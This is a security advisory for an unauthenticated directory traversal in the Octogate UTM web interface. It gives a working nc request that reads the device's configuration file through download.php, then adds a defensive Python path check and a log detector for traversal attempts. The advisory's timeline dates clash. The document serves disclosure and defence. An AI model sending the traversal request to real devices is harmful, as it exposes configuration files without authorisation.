Octogate UTM Admin Interface Directory Traversal
================================================

Affected Products/Versions
--------------------------

Product Name: Octogate
Version: 3.0.12

Product/Company Information
---------------------------

Octogate is a UTM device with the following features: Application Firewall, Intrusion Detection and Prevention, Stateful and Deep Packet Inspection, DoS and DDoS protection, and Reverse Proxy. Octogate IT Security Systems GmbH is based in Germany.

Vulnerability Description
-------------------------

The Octogate UTM device is managed via a web interface. The download function for the SSL certificate and the documentation is reachable without authentication, and it allows access to files outside of the web root.

Example request:

echo -en "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer: http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80

Patch Information
-----------------

A patch is available from the vendor.

Advisory Information
--------------------

http://www.oliverkarow.de/research/octogate.txt

Timeline
--------

24.10.2014 - Reported to vendor
xx.xx.2014 - Fixed by vendor
26.08.2014 - Advisory release ( lazy me )
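The advisory does not show how the download function should have been written or how such requests look in a log. The following Python example is added here and is not Octogate's code: it implements the server-side check that a file download handler needs (canonicalise the requested path and confirm it stays under the web root, which rejects the "/../.." shape of the request above) and a detector that flags traversal attempts, including percent-encoded ones, in access-log lines. The web root, file names and log lines are constructed for the example; the helper names are hypothetical.

```python
"""Added example, not Octogate's code: a download-path check that confines
requests to the web root, plus a detector that flags traversal attempts in
access-log lines. Paths and log lines are constructed for the example."""
import os
import re
import tempfile
from urllib.parse import parse_qs, unquote, urlparse


def resolve_within_root(web_root, requested):
    """Return the canonical path for `requested` if it stays under `web_root`,
    otherwise None. realpath() collapses '..' and follows symlinks, so the
    comparison is made on the real on-disk location, not the literal string."""
    root = os.path.realpath(web_root)
    # os.path.join would discard `root` if `requested` were absolute, so a
    # leading separator (as in the advisory's "/../..") is stripped first.
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/\\")))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


# A '..' segment bounded by separators or string ends; applied after decoding.
TRAVERSAL_SEGMENT = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def is_traversal_request(request_line):
    """True if the path or any query parameter of an HTTP request line
    contains a '..' segment. Values are URL-decoded again (twice) so single
    and double percent-encoding (%2e%2e%2f, %252e) are both caught."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return False
    parsed = urlparse(parts[1])
    candidates = [parsed.path]
    for values in parse_qs(parsed.query, keep_blank_values=True).values():
        candidates.extend(values)
    return any(TRAVERSAL_SEGMENT.search(unquote(unquote(c))) for c in candidates)


# Constructed access-log lines (Common Log Format), not from a real device.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [24/Oct/2014:10:00:01 +0200] "GET /scripts/download.php?file=docs/manual.pdf&type=dl HTTP/1.0" 200 8192',
    '192.0.2.10 - - [24/Oct/2014:10:00:02 +0200] "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl HTTP/1.0" 200 1337',
    '192.0.2.11 - - [24/Oct/2014:10:00:03 +0200] "GET /scripts/download.php?file=%2e%2e%2f%2e%2e%2fsecret.ini&type=dl HTTP/1.0" 404 0',
]

REQUEST_FIELD = re.compile(r'"([^"]*)"')


def flag_traversal_in_log(lines):
    """Return the log lines whose quoted request carries a traversal attempt."""
    hits = []
    for line in lines:
        m = REQUEST_FIELD.search(line)
        if m and is_traversal_request(m.group(1)):
            hits.append(line)
    return hits


def demo():
    """Build a throwaway web root with one legitimate file and show that the
    advisory's request shape is rejected while a normal download resolves."""
    root = tempfile.mkdtemp()  # constructed web root for the example
    with open(os.path.join(root, "manual.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample\n")
    return {
        "benign": resolve_within_root(root, "manual.pdf"),
        "traversal": resolve_within_root(root, "/../../../../../../octo/etc/ini.d/octogate.ini"),
        "flagged": flag_traversal_in_log(SAMPLE_ACCESS_LOG),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check in resolve_within_root is the mitigation side: it compares canonical paths rather than searching the string for "..", so encoded or symlinked variants are handled the same way. The fix that closes this advisory, of course, also requires the download endpoint to enforce authentication; the path check only bounds what an authenticated request can read. Note that a 200 on the second log line is the signal an analyst should look for when reviewing historic logs, since a rejected attempt would show 403 or 404.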